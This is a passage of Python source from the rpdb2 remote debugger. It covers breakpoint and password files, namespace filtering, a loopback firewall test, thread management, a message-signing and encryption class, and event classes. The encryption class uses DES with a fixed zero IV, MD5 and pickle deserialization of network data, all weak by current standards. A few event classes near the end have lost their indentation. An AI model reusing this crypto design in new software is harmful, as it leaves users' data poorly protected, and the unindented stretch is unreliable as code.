    Map source path *filename* to the path of its breakpoints file.

    The file name is a truncated HMAC digest of the source path, so
    arbitrary paths map to short, filesystem-safe names.
    """
    key = as_bytes(filename)
    # digestmod must be explicit: hmac.new() without it raises TypeError
    # on Python >= 3.8. _md5 matches both the old implicit default and
    # the digest used elsewhere in this file, so names are unchanged.
    tmp_filename = hmac.new(key, digestmod = _md5).hexdigest()[:10]

    if os.name == POSIX:
        home = os.path.expanduser('~')
        bpldir = os.path.join(home, RPDB_BPL_FOLDER)
        cleanup_bpl_folder(bpldir)
        path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
        return path

    #
    # gettempdir() is used since it works with unicode user names on
    # Windows.
    #
    tmpdir = tempfile.gettempdir()

    bpldir = os.path.join(tmpdir, RPDB_BPL_FOLDER_NT)

    if not os.path.exists(bpldir):
        #
        # Folder creation is done here since this is a temp folder.
        #
        try:
            os.mkdir(bpldir, int('0700', 8))
        except:
            print_debug_exception()
            raise CException

    else:
        cleanup_bpl_folder(bpldir)

    path = os.path.join(bpldir, tmp_filename) + BREAKPOINTS_FILE_EXT
    return path
def calc_pwd_file_path(rid):
    """
    Calc password file path for Posix systems:
    '~/.rpdb2_settings/<rid>'
    """
    home = os.path.expanduser('~')
    return os.path.join(home, RPDB_PWD_FOLDER, rid)
def create_pwd_file(rid, _rpdb2_pwd):
    """
    Create password file for Posix systems.

    Writes *_rpdb2_pwd* to the session file for *rid*, created with
    mode 0600 so only the owner can read it. No-op on non-Posix.
    """
    if os.name != POSIX:
        return

    path = calc_pwd_file_path(rid)

    fd = os.open(path, os.O_WRONLY | os.O_CREAT, int('0600', 8))
    try:
        os.write(fd, as_bytes(_rpdb2_pwd))
    finally:
        # Always release the descriptor, even if the write fails
        # (the original leaked fd on a write error).
        os.close(fd)
def read_pwd_file(rid):
    """
    Read password from password file for Posix systems.

    Returns the stored password as a (strict) unicode string.
    """
    assert(os.name == POSIX)

    path = calc_pwd_file_path(rid)

    # try/finally guarantees the handle is closed even if read() raises;
    # the original leaked it on error. (try/finally rather than 'with'
    # to preserve the file's old-Python compatibility.)
    p = open(path, 'r')
    try:
        _rpdb2_pwd = p.read()
    finally:
        p.close()

    return as_unicode(_rpdb2_pwd, fstrict = True)
def delete_pwd_file(rid):
    """
    Delete password file for Posix systems. Errors are ignored; this is
    best-effort cleanup. No-op on non-Posix systems.
    """
    if os.name != POSIX:
        return

    target = calc_pwd_file_path(rid)

    try:
        os.remove(target)
    except:
        pass
def CalcUserShell():
    """
    Return the user's shell: $SHELL when set, else the login shell
    parsed from /etc/passwd, falling back to 'sh' on any failure.
    """
    try:
        s = os.getenv('SHELL')
        if s != None:
            return s

        import getpass
        username = getpass.getuser()

        f = open('/etc/passwd', 'r')
        l = f.read()
        f.close()

        ll = l.split('\n')
        # Map user name -> last ':'-separated field (the shell).
        d = dict([(e.split(':', 1)[0], e.split(':')[-1]) for e in ll])

        return d[username]

    except:
        # Best effort only; 'sh' is always a safe answer.
        return 'sh'
def IsFilteredAttribute(a):
    """
    Return True for dunder attribute names that the namespace viewer
    should hide. A short whitelist of interesting dunders is always
    shown.
    """
    interesting = ('__class__', '__bases__', '__file__', '__doc__', '__name__', '__all__', '__builtins__')

    is_dunder = a.startswith('__') and a.endswith('__')
    return is_dunder and a not in interesting
def IsFilteredAttribute2(r, a):
    """
    Return True when attribute *a* of *r* looks like a callable or a
    type (filtered at the strictest filter level). Any error means
    'not filtered'.
    """
    try:
        t = parse_type(type(getattr(r, a)))
        return 'function' in t or 'method' in t or t == 'type'
    except:
        return False
def CalcFilteredDir(r, filter_level):
    """
    dir(*r*) with workaround removals applied and, when *filter_level*
    is non-zero, uninteresting dunder attributes filtered out.
    """
    d = dir(r)

    if 'finfo' in d and parse_type(type(r)) == 'mp_request':
        #
        # Workaround mod_python segfault in type(req.finfo) by
        # removing this attribute from the namespace viewer.
        #
        d.remove('finfo')

    if filter_level == 0:
        return d

    fd = [a for a in d if not IsFilteredAttribute(a)]

    return fd
def CalcIdentity(r, filter_level):
    """
    Return the identity used when comparing attributes: the underlying
    im_func of Python 2 bound/unbound methods when filtering is active,
    otherwise the object itself.
    """
    if filter_level == 0 or not hasattr(r, 'im_func'):
        return r

    return r.im_func
def getattr_nothrow(o, a):
    """getattr() variant that never raises; failures yield ERROR_NO_ATTRIBUTE."""
    try:
        value = getattr(o, a)
    except AttributeError:
        return ERROR_NO_ATTRIBUTE
    except:
        print_debug_exception()
        return ERROR_NO_ATTRIBUTE

    return value
def calc_attribute_list(r, filter_level):
    """
    Return the list of attribute names of *r* worth displaying, pruning
    attributes inherited unchanged from the class and its bases.
    filter_level 0 shows everything; higher levels filter harder.
    """
    d = CalcFilteredDir(r, filter_level)
    rs = set(d)

    c = getattr_nothrow(r, '__class__')
    if not c is ERROR_NO_ATTRIBUTE:
        d = CalcFilteredDir(c, False)
        cs = set(d)
        s = rs & cs

        for e in s:
            o1 = getattr_nothrow(r, e)
            o2 = getattr_nothrow(c, e)
            # Drop attributes whose value is identical to the class's.
            if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
                rs.discard(e)

            try:
                # Bound methods: also drop when both bind the same instance.
                if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
                    rs.discard(e)
            except:
                pass

    bl = getattr_nothrow(r, '__bases__')
    if type(bl) == tuple:
        # Same pruning against each base class.
        for b in bl:
            d = CalcFilteredDir(b, False)
            bs = set(d)
            s = rs & bs

            for e in s:
                o1 = getattr_nothrow(r, e)
                o2 = getattr_nothrow(b, e)
                if o1 is ERROR_NO_ATTRIBUTE or CalcIdentity(o1, filter_level) is CalcIdentity(o2, filter_level):
                    rs.discard(e)

                try:
                    if filter_level == 1 and getattr(o1, '__self__') is getattr(o2, '__self__'):
                        rs.discard(e)
                except:
                    pass

    l = [a for a in rs if (filter_level < 2 or not IsFilteredAttribute2(r, a))]

    # __class__ and __bases__ are always listed first when present.
    if hasattr(r, '__class__') and not '__class__' in l:
        l = ['__class__'] + l

    if hasattr(r, '__bases__') and not '__bases__' in l:
        l = ['__bases__'] + l

    al = [a for a in l if hasattr(r, a)]

    return al
class _RPDB2_FindRepr:
    """
    Helper that lets the namespace viewer address an element of a
    container by the (truncated) repr of its key instead of by an
    object reference. Scans are bounded by MAX_SORTABLE_LENGTH.
    """

    def __init__(self, o, repr_limit):
        # o: the container to search; repr_limit: max repr length used
        # when matching keys.
        self.m_object = o
        self.m_repr_limit = repr_limit

    def __getitem__(self, key):
        # Find the item whose bounded repr equals *key*; returns the
        # dict value for dicts, the element itself otherwise, or None.
        # NOTE(review): .replace('"', '"') below is a no-op - it looks
        # like an escaping step that was lost; left untouched.
        index = 0
        for i in self.m_object:
            if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
                if isinstance(self.m_object, dict):
                    return self.m_object[i]

                return i

            index += 1
            if index > MAX_SORTABLE_LENGTH:
                return None

    def __setitem__(self, key, value):
        # Same scan as __getitem__, but assignment applies to dicts only.
        if not isinstance(self.m_object, dict):
            return

        index = 0
        for i in self.m_object:
            if repr_ltd(i, self.m_repr_limit, encoding = ENCODING_RAW_I).replace('"', '"') == key:
                self.m_object[i] = value
                return

            index += 1
            if index > MAX_SORTABLE_LENGTH:
                return
#
# Since on Python 3000 the comparison of different types raises exceptions and
# the __cmp__ method was removed, sorting of namespace items is based on
# lexicographic order except for numbers which are sorted normally and appear
# before all other types.
#
def sort(s):
    """
    Sort list *s* in place using the sort_key() ordering (numbers first,
    everything else lexicographically by bounded repr).
    NOTE: intentionally shadows no builtin (there is no builtin 'sort').
    """
    if sys.version_info[:2] == (2, 3):
        #
        # On Python 2.3 the key parameter is not supported.
        #
        s.sort(sort_cmp)
        return

    s.sort(key = sort_key)
def sort_key(e):
    """
    Ordering key for namespace items: numbers sort before everything
    else; non-numbers compare by a bounded repr.
    """
    if is_py3k() and isinstance(e, numbers.Number):
        return (0, e)

    if not is_py3k() and operator.isNumberType(e):
        return (0, e)

    return (1, repr_ltd(e, 256, encoding = ENCODING_RAW_I))
def sort_cmp(x, y):
    """Python 2.3 comparator equivalent of sorting by sort_key()."""
    skx = sort_key(x)
    sky = sort_key(y)
    return cmp(skx, sky)
def recalc_sys_path(old_pythonpath):
    """
    Replace the sys.path entries that came from *old_pythonpath* with
    entries derived from the current PYTHONPATH, each normalized with
    my_abspath()/winlower(). Entries are spliced in from index 1 so
    sys.path[0] (the script directory) is left alone.
    """
    opl = old_pythonpath.split(os.path.pathsep)
    del sys.path[1: 1 + len(opl)]

    pythonpath = os.environ.get('PYTHONPATH', '')
    ppl = pythonpath.split(os.path.pathsep)

    for i, p in enumerate(ppl):
        abspath = my_abspath(p)
        lowered = winlower(abspath)
        sys.path.insert(1 + i, lowered)
def calc_signame(signum):
    """
    Return the SIG* name for signal number *signum*, or '?' when it is
    unknown. Pseudo names (SIG_IGN/SIG_DFL) and the realtime min/max
    markers are never reported.
    """
    skipped = ('SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX')

    for name, value in vars(signal).items():
        if value != signum:
            continue

        if name.startswith('SIG') and name not in skipped:
            return name

    return '?'
#
# Similar to traceback.extract_stack() but fixes path with calc_frame_path()
#
def my_extract_stack(f):
    """
    Like traceback.extract_stack(f), but with each frame's path fixed
    through calc_frame_path(). Returns [] for a None frame; entries are
    (path, lineno, func_name, text), outermost frame first.
    """
    if f == None:
        return []

    try:
        # traceback module calls are serialized under a global lock.
        g_traceback_lock.acquire()
        _s = traceback.extract_stack(f)
    finally:
        g_traceback_lock.release()

    _s.reverse()

    s = []
    for (p, ln, fn, text) in _s:
        # Replace the raw path with the debugger's normalized frame path.
        path = as_unicode(calc_frame_path(f), sys.getfilesystemencoding())

        if text == None:
            text = ''

        s.append((path, ln, as_unicode(fn), as_unicode(text)))

        f = f.f_back
        if f == None:
            break

    s.reverse()
    return s
#
# Similar to traceback.extract_tb() but fixes path with calc_frame_path()
#
def my_extract_tb(tb):
    """
    Like traceback.extract_tb(tb), but with each entry's path fixed
    through calc_frame_path(). Entries are (path, lineno, func_name,
    text).
    """
    try:
        # traceback module calls are serialized under a global lock.
        g_traceback_lock.acquire()
        _s = traceback.extract_tb(tb)
    finally:
        g_traceback_lock.release()

    s = []
    for (p, ln, fn, text) in _s:
        path = as_unicode(calc_frame_path(tb.tb_frame), sys.getfilesystemencoding())

        if text == None:
            text = ''

        s.append((path, ln, as_unicode(fn), as_unicode(text)))

        tb = tb.tb_next
        if tb == None:
            break

    return s
def get_traceback(frame, ctx):
    """
    Best-effort recovery of the traceback of the exception currently
    being handled in *frame*. Falls back to a local variable literally
    named 'traceback'; returns None implicitly when nothing is found.
    """
    if is_py3k():
        if ctx.get_exc_info() != None:
            return ctx.get_exc_info()[2]
    else:
        # Python 2 keeps the handled traceback on the frame itself.
        if frame.f_exc_traceback != None:
            return frame.f_exc_traceback

    locals = copy.copy(frame.f_locals)
    if not 'traceback' in locals:
        return None

    tb = locals['traceback']
    # Heuristic: accept the local only if it has exactly the attribute
    # set of a real traceback object.
    if dir(tb) == ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
        return tb
class CFirewallTest:
    """
    Check whether a local firewall blocks TCP traffic by starting an
    echo server thread and a client thread and timing their progress.
    Only one test runs at a time (class-wide lock).
    """

    # Shared across instances so consecutive tests coordinate.
    m_port = None
    m_thread_server = None
    m_thread_client = None
    m_lock = threading.RLock()

    def __init__(self, fremote = False, timeout = 4):
        # fremote: bind all interfaces instead of loopback only.
        if fremote:
            self.m_loopback = ''
        else:
            self.m_loopback = LOOPBACK

        self.m_timeout = timeout
        self.m_result = None
        self.m_last_server_error = None
        self.m_last_client_error = None

    def run(self):
        """Run the test; True means traffic got through, False means blocked/timed out."""
        CFirewallTest.m_lock.acquire()
        try:
            #
            # If either the server or client are alive after a timeout
            # it means they are blocked by a firewall. Return False.
            #
            server = CFirewallTest.m_thread_server
            if server != None and thread_is_alive(server):
                server.join(self.m_timeout * 1.5)

                if thread_is_alive(server):
                    return False

            client = CFirewallTest.m_thread_client
            if client != None and thread_is_alive(client):
                client.join(self.m_timeout * 1.5)

                if thread_is_alive(client):
                    return False

            CFirewallTest.m_port = None
            self.m_result = None

            t0 = time.time()
            server = threading.Thread(target = self.__server)
            server.start()
            CFirewallTest.m_thread_server = server

            #
            # If server exited or failed to setup after a timeout
            # it means it was blocked by a firewall.
            #
            while CFirewallTest.m_port == None and thread_is_alive(server):
                if time.time() - t0 > self.m_timeout * 1.5:
                    return False

                time.sleep(0.1)

            if not thread_is_alive(server):
                return False

            t0 = time.time()
            client = threading.Thread(target = self.__client)
            client.start()
            CFirewallTest.m_thread_client = client

            while self.m_result == None and thread_is_alive(client):
                if time.time() - t0 > self.m_timeout * 1.5:
                    return False

                time.sleep(0.1)

            return self.m_result

        finally:
            CFirewallTest.m_lock.release()

    def __client(self):
        # Connect to the server thread and attempt one echo round trip;
        # records success/failure in self.m_result.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(self.m_timeout)

        try:
            try:
                s.connect((LOOPBACK, CFirewallTest.m_port))

                s.send(as_bytes('Hello, world'))
                data = self.__recv(s, 1024)
                self.m_result = True

            except socket.error:
                e = sys.exc_info()[1]
                self.m_last_client_error = e
                self.m_result = False

        finally:
            s.close()

    def __server(self):
        # Echo server: bind the first free port in the configured range,
        # publish it via CFirewallTest.m_port, then echo until EOF.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(self.m_timeout)

        if os.name == POSIX:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        port = SERVER_PORT_RANGE_START

        while True:
            try:
                s.bind((self.m_loopback, port))
                break

            except socket.error:
                e = sys.exc_info()[1]

                if self.__GetSocketError(e) != errno.EADDRINUSE:
                    self.m_last_server_error = e
                    s.close()
                    return

                if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
                    # Whole range exhausted.
                    self.m_last_server_error = e
                    s.close()
                    return

                port += 1

        CFirewallTest.m_port = port

        try:
            try:
                conn = None
                s.listen(1)
                conn, addr = s.accept()

                while True:
                    data = self.__recv(conn, 1024)
                    if not data:
                        return

                    conn.send(data)

            except socket.error:
                e = sys.exc_info()[1]
                self.m_last_server_error = e

        finally:
            if conn != None:
                conn.close()
            s.close()

    def __recv(self, s, len):
        # recv() with retry on EWOULDBLOCK, bounded by self.m_timeout.
        t0 = time.time()
        while True:
            try:
                data = s.recv(1024)
                return data

            except socket.error:
                e = sys.exc_info()[1]
                if self.__GetSocketError(e) != errno.EWOULDBLOCK:
                    print_debug('socket error was caught, %s' % repr(e))
                    raise

                if time.time() - t0 > self.m_timeout:
                    raise

                continue

    def __GetSocketError(self, e):
        # Extract the errno from a socket.error; -1 when unavailable.
        if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
            return -1

        return e.args[0]
#
# ---------------------------------- CThread ---------------------------------------
#
class CThread (threading.Thread):
    """
    threading.Thread subclass that registers every started instance in
    a class-wide registry so joinAll() can shut down all debugger
    threads at exit.
    """

    # Class-wide state: set m_fstop to refuse new threads during
    # shutdown; m_threads maps id -> weakref of live instances.
    m_fstop = False
    m_threads = {}

    m_lock = threading.RLock()
    m_id = 0

    def __init__(self, name = None, target = None, args = (), shutdown = None):
        # shutdown: optional callback invoked by joinAll() to ask the
        # thread to stop.
        threading.Thread.__init__(self, name = name, target = target, args = args)

        self.m_fstarted = False
        self.m_shutdown_callback = shutdown

        self.m_id = self.__getId()

    def __del__(self):
        #print_debug('Destructor called for ' + thread_get_name(self))

        #threading.Thread.__del__(self)

        if self.m_fstarted:
            try:
                del CThread.m_threads[self.m_id]
            except KeyError:
                pass

    def start(self):
        """Register and start the thread, unless a global stop is underway."""
        if CThread.m_fstop:
            return

        CThread.m_threads[self.m_id] = weakref.ref(self)

        # Re-check after registration to close the race with joinAll().
        if CThread.m_fstop:
            del CThread.m_threads[self.m_id]
            return

        self.m_fstarted = True

        threading.Thread.start(self)

    def run(self):
        # Never trace/profile the debugger's own worker threads.
        sys.settrace(None)
        sys.setprofile(None)
        threading.Thread.run(self)

    def join(self, timeout = None):
        try:
            threading.Thread.join(self, timeout)
        except AssertionError:
            # Joining a never-started thread is treated as a no-op.
            pass

    def shutdown(self):
        if self.m_shutdown_callback:
            self.m_shutdown_callback()

    def joinAll(cls):
        """Ask every registered thread to shut down and wait (bounded) for them."""
        print_debug('Shutting down debugger threads...')

        CThread.m_fstop = True

        for tid, w in list(CThread.m_threads.items()):
            t = w()
            if not t:
                continue

            try:
                #print_debug('Calling shutdown of thread %s.' % thread_get_name(t))
                t.shutdown()
            except:
                pass

            t = None

        t0 = time.time()
        while len(CThread.m_threads) > 0:
            if time.time() - t0 > SHUTDOWN_TIMEOUT:
                print_debug('Shut down of debugger threads has TIMED OUT!')
                return

            #print_debug(repr(CThread.m_threads))
            time.sleep(0.1)

        print_debug('Shut down debugger threads, done.')

    joinAll = classmethod(joinAll)

    def clearJoin(cls):
        # Re-enable thread creation (e.g. after a fork).
        CThread.m_fstop = False

    clearJoin = classmethod(clearJoin)

    def __getId(self):
        # Allocate a unique id under the class lock.
        CThread.m_lock.acquire()
        id = CThread.m_id
        CThread.m_id += 1
        CThread.m_lock.release()

        return id
#
#--------------------------------------- Crypto ---------------------------------------
#
class CCrypto:
    """
    Handle authentication and encryption of data, using password protection.

    Messages are pickled, HMAC-signed, optionally zlib-compressed and
    DES-CBC encrypted, then base64-encoded. Replay protection is based
    on a monotonically growing message index checked per peer.
    """

    # Cache of strengthened keys, keyed by password (key derivation is
    # deliberately slow; see __calc_key).
    m_keys = {}

    def __init__(self, _rpdb2_pwd, fAllowUnencrypted, rid):
        assert(is_unicode(_rpdb2_pwd))
        assert(is_unicode(rid))

        self.m_rpdb2_pwd = _rpdb2_pwd
        self.m_key = self.__calc_key(_rpdb2_pwd)

        self.m_fAllowUnencrypted = fAllowUnencrypted
        self.m_rid = rid

        self.m_failure_lock = threading.RLock()

        self.m_lock = threading.RLock()

        # Replay-protection state: random inbound anchor, peer-supplied
        # outbound anchor, and the per-slot index table.
        self.m_index_anchor_in = random.randint(0, 1000000000)
        self.m_index_anchor_ex = 0

        self.m_index = 0

        self.m_index_table = {}
        self.m_index_table_size = INDEX_TABLE_SIZE
        self.m_max_index = 0

    def __calc_key(self, _rpdb2_pwd):
        """
        Create and return a key from a password.

        A Weak password means a weak key.
        """
        if _rpdb2_pwd in CCrypto.m_keys:
            return CCrypto.m_keys[_rpdb2_pwd]

        key = as_bytes(_rpdb2_pwd)
        suffix = key[:16]

        d = hmac.new(key, digestmod = _md5)

        #
        # The following loop takes around a second to complete
        # and should strengthen the password by ~12 bits.
        # a good password is ~30 bits strong so we are looking
        # at ~42 bits strong key
        #
        for i in range(2 ** 12):
            d.update((key + suffix) * 16)
            key = d.digest()

        CCrypto.m_keys[_rpdb2_pwd] = key

        return key

    def set_index(self, i, anchor):
        # Adopt the peer's index/anchor for outgoing messages.
        try:
            self.m_lock.acquire()

            self.m_index = i
            self.m_index_anchor_ex = anchor

        finally:
            self.m_lock.release()

    def get_max_index(self):
        # Highest message index verified so far.
        return self.m_max_index

    def do_crypto(self, args, fencrypt):
        """
        Sign args and possibly encrypt.
        Return signed/encrypted string.
        """
        if not fencrypt and not self.m_fAllowUnencrypted:
            raise EncryptionExpected

        if fencrypt and not is_encryption_supported():
            raise EncryptionNotSupported

        (digest, s) = self.__sign(args)

        fcompress = False

        # Compress large payloads, but only when it actually pays off.
        if len(s) > 50000:
            _s = zlib.compress(s)

            if len(_s) < len(s) * 0.4:
                s = _s
                fcompress = True

        if fencrypt:
            s = self.__encrypt(s)

        # NOTE(review): base64.encodestring()/decodestring() were removed
        # in Python 3.9 (encodebytes/decodebytes replace them) - confirm
        # the targeted runtimes before relying on this path.
        s = base64.encodestring(s)
        u = as_unicode(s)

        return (fcompress, digest, u)

    def undo_crypto(self, fencrypt, fcompress, digest, msg, fVerifyIndex = True):
        """
        Take crypto string, verify its signature and decrypt it, if
        needed.
        """
        if not fencrypt and not self.m_fAllowUnencrypted:
            raise EncryptionExpected

        if fencrypt and not is_encryption_supported():
            raise EncryptionNotSupported

        s = as_bytes(msg)
        s = base64.decodestring(s)

        if fencrypt:
            s = self.__decrypt(s)

        if fcompress:
            s = zlib.decompress(s)

        args, id = self.__verify_signature(digest, s, fVerifyIndex)

        return (args, id)

    def __encrypt(self, s):
        # NUL-pad to the DES block size; pad/truncate the key to key_size.
        s_padded = s + as_bytes('\x00') * (DES.block_size - (len(s) % DES.block_size))

        key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
        iv = '0' * DES.block_size

        d = DES.new(key_padded, DES.MODE_CBC, iv)
        r = d.encrypt(s_padded)

        return r

    def __decrypt(self, s):
        try:
            key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
            iv = '0' * DES.block_size

            d = DES.new(key_padded, DES.MODE_CBC, iv)
            _s = d.decrypt(s).strip(as_bytes('\x00'))

            return _s

        except:
            # Delay on failure to slow brute-force attempts.
            self.__wait_a_little()
            raise DecryptionFailure

    def __sign(self, args):
        # Pickle (anchor, index, rid, args) and HMAC it.
        i = self.__get_next_index()
        pack = (self.m_index_anchor_ex, i, self.m_rid, args)

        #print_debug('***** 1' + repr(args)[:50])

        s = pickle.dumps(pack, 2)

        #print_debug('***** 2' + repr(args)[:50])

        h = hmac.new(self.m_key, s, digestmod = _md5)
        d = h.hexdigest()

        #if 'coding:' in s:
        #    print_debug('%s, %s, %s\n\n==========\n\n%s' % (len(s), d, repr(args), repr(s)))

        return (d, s)

    def __get_next_index(self):
        try:
            self.m_lock.acquire()

            self.m_index += 1
            return self.m_index

        finally:
            self.m_lock.release()

    def __verify_signature(self, digest, s, fVerifyIndex):
        try:
            h = hmac.new(self.m_key, s, digestmod = _md5)
            d = h.hexdigest()

            #if 'coding:' in s:
            #    print_debug('%s, %s, %s, %s' % (len(s), digest, d, repr(s)))

            if d != digest:
                self.__wait_a_little()
                raise AuthenticationFailure

            # pickle.loads() runs only after the HMAC check above passed,
            # i.e. on data signed with the shared secret.
            pack = pickle.loads(s)
            (anchor, i, id, args) = pack

        except AuthenticationFailure:
            raise

        except:
            print_debug_exception()
            self.__wait_a_little()
            raise AuthenticationBadData

        if fVerifyIndex:
            self.__verify_index(anchor, i, id)

        return args, id

    def __verify_index(self, anchor, i, id):
        """
        Manage messages ids to prevent replay of old messages.
        """
        try:
            try:
                self.m_lock.acquire()

                if anchor != self.m_index_anchor_in:
                    raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)

                if i > self.m_max_index + INDEX_TABLE_SIZE // 2:
                    raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)

                i_mod = i % INDEX_TABLE_SIZE
                (iv, idl) = self.m_index_table.get(i_mod, (None, None))

                #print >> sys.__stderr__, i, i_mod, iv, self.m_max_index

                # Accept a strictly newer index, or the same index from a
                # new sender id; anything else is a replay.
                if (iv is None) or (i > iv):
                    idl = [id]
                elif (iv == i) and (not id in idl):
                    idl.append(id)
                else:
                    raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)

                self.m_index_table[i_mod] = (i, idl)

                if i > self.m_max_index:
                    self.m_max_index = i

                return self.m_index

            finally:
                self.m_lock.release()

        except:
            self.__wait_a_little()
            raise

    def __wait_a_little(self):
        # Serialize and delay failure paths to slow brute forcing.
        self.m_failure_lock.acquire()
        time.sleep((1.0 + random.random()) / 2)
        self.m_failure_lock.release()
#
# --------------------------------- Events List --------------------------
#
class CEvent(object):
    """
    Base class for events.
    """

    def __reduce__(self):
        # Pickle as (type, instance dict) so events survive the RPC layer;
        # copy_reg is the Python 2 name of copyreg.
        rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
        return rv

    def is_match(self, arg):
        # Subclasses override to support event filtering; the base
        # implementation matches nothing.
        pass
class CEventNull(CEvent):
    """
    Sent to release event listeners (Internal, speeds up shutdown).
    """

    pass
class CEventEmbeddedSync(CEvent):
    """
    Sent when an embedded interpreter becomes active if it needs to
    determine if there are pending break requests. (Internal)
    """

    pass
class CEventClearSourceCache(CEvent):
    """
    Sent when the source cache is cleared.
    """

    pass
class CEventSignalIntercepted(CEvent):
    """
    This event is sent when a signal is intercepted inside tracing code.
    Such signals are held pending until tracing code is returned from.
    """

    def __init__(self, signum):
        # Numeric signal and its resolved SIG* name.
        self.m_signum = signum
        self.m_signame = calc_signame(signum)
class CEventSignalException(CEvent):
    """
    This event is sent when the handler of a previously intercepted signal
    raises an exception. Such exceptions are ignored because of technical
    limitations.
    """

    def __init__(self, signum, description):
        self.m_signum = signum
        self.m_signame = calc_signame(signum)
        # Human-readable description of the swallowed exception.
        self.m_description = description
class CEventEncoding(CEvent):
    """
    The encoding has been set.
    """

    def __init__(self, encoding, fraw):
        # fraw: whether raw (unfiltered) encoding mode is active.
        self.m_encoding = encoding
        self.m_fraw = fraw
class CEventPsycoWarning(CEvent):
"""
The psyco module was detected. rpdb2 is incompatible with this module.
"""
pass
class CEventConflictingModules(CEvent):
"""
Conflicting modules were detected. rpdb2 is incompatible with these modules.
"""
def __init__(self, modules_list):
self.m_modules_list = modules_list
class CEventSyncReceivers(CEvent):
"""
A base class for events that need to be received by all listeners at
the same time. The synchronization mechanism is internal to rpdb2.
"""
def __init__(self, sync_n):
self.m_sync_n = sync_n
class CEventForkSwitch(CEventSyncReceivers):
    """
    Debuggee is about to fork; listeners should try to reconnect.
    """
class CEventExecSwitch(CEventSyncReceivers):
    """
    Debuggee is about to exec; listeners should try to reconnect.
    """
class CEventExit(CEvent):
    """
    Debuggee is terminating.
    """
class CEventState(CEvent):
    """
    State of the debugger.
    Value of m_state can be one of the STATE_* globals.
    """
    def __init__(self, state):
        # States are normalized to unicode for comparison and transport.
        self.m_state = as_unicode(state)
    def is_match(self, arg):
        # Compare against the unicode-normalized form of arg.
        return self.m_state == as_unicode(arg)
class CEventSynchronicity(CEvent):
    """
    Mode of synchronicity; sent whenever the mode changes.
    """
    def __init__(self, fsynchronicity):
        self.m_fsynchronicity = fsynchronicity
    def is_match(self, arg):
        return self.m_fsynchronicity == arg
class CEventTrap(CEvent):
    """
    Mode of "trap unhandled exceptions"; sent whenever the mode changes.
    """
    def __init__(self, ftrap):
        self.m_ftrap = ftrap
    def is_match(self, arg):
        return self.m_ftrap == arg
class CEventForkMode(CEvent):
    """
    Mode of fork behavior has changed; sent whenever the mode changes.
    """
    def __init__(self, ffork_into_child, ffork_auto):
        # Whether the debugger follows the child, and whether the choice
        # is made automatically.
        self.m_ffork_into_child = ffork_into_child
        self.m_ffork_auto = ffork_auto
class CEventUnhandledException(CEvent):
    """
    Unhandled Exception
    Sent when an unhandled exception is caught.
    """
class CEventNamespace(CEvent):
    """
    Namespace has changed.
    Tells the debugger it should query the namespace again.
    """
class CEventNoThreads(CEvent):
    """
    No threads to debug.
    Debuggee notifies the debugger that it has no threads. This can
    happen in embedded debugging and in a python interpreter session.
    """
class CEventThreads(CEvent):
    """
    State of threads.
    """
    def __init__(self, _current_thread, thread_list):
        # The currently selected thread and the full thread list.
        self.m_current_thread = _current_thread
        self.m_thread_list = thread_list
class CEventThreadBroken(CEvent):
    """
    A thread has broken.
    """
    def __init__(self, tid, name):
        self.m_tid = tid
        self.m_name = as_unicode(name)
class CEventStack(CEvent):
    """
    Stack of current thread.
    """
    def __init__(self, stack):
        self.m_stack = stack
class CEventStackFrameChange(CEvent):
    """
    Stack frame has changed.
    Sent when the debugger moves up or down the stack.
    """
    def __init__(self, frame_index):
        # Index of the newly selected frame.
        self.m_frame_index = frame_index
class CEventStackDepth(CEvent):
    """
    Stack depth has changed.
    """
    def __init__(self, stack_depth, stack_depth_exception):
        self.m_stack_depth = stack_depth
        self.m_stack_depth_exception = stack_depth_exception
class CEventBreakpoint(CEvent):
    """
    A breakpoint or breakpoints changed.
    m_action is one of the DISABLE/ENABLE/REMOVE/SET constants;
    m_id_list lists the affected breakpoint ids, or m_fAll is True when
    the action applies to all breakpoints.
    """
    DISABLE = as_unicode('disable')
    ENABLE = as_unicode('enable')
    REMOVE = as_unicode('remove')
    SET = as_unicode('set')
    def __init__(self, bp, action = SET, id_list = None, fAll = False):
        # Store a detached copy of the breakpoint (no compiled code object)
        # so the event can be serialized to the debugger.
        self.m_bp = breakpoint_copy(bp)
        self.m_action = action
        # BUGFIX: the default used to be a shared mutable list (id_list = []),
        # which every instance constructed without an explicit id_list would
        # alias. Use None as sentinel and allocate a fresh list per instance.
        self.m_id_list = [] if id_list is None else id_list
        self.m_fAll = fAll
class CEventSync(CEvent):
    """
    Internal (not sent to the debugger) event that triggers the
    firing of other events that help the debugger synchronize with
    the state of the debuggee.
    """
    def __init__(self, fException, fSendUnhandled):
        # Flags forwarded to the synchronization logic.
        self.m_fException = fException
        self.m_fSendUnhandled = fSendUnhandled
#
# --------------------------------- Event Manager --------------------------
#
class CEventDispatcherRecord:
    """
    Internal structure that binds a callback to particular events.
    """
    def __init__(self, callback, event_type_dict, fSingleUse):
        self.m_callback = callback
        # Defensive copy: callers may mutate their dict afterwards.
        self.m_event_type_dict = copy.copy(event_type_dict)
        self.m_fSingleUse = fSingleUse
    def is_match(self, event):
        """
        Return True if this record's callback should fire for event.
        """
        matching_types = [t for t in self.m_event_type_dict.keys() if isinstance(event, t)]
        if not matching_types:
            return False
        # Only the first matching registered type is examined.
        filters = self.m_event_type_dict[matching_types[0]]
        exclude_list = filters.get(EVENT_EXCLUDE, [])
        if exclude_list:
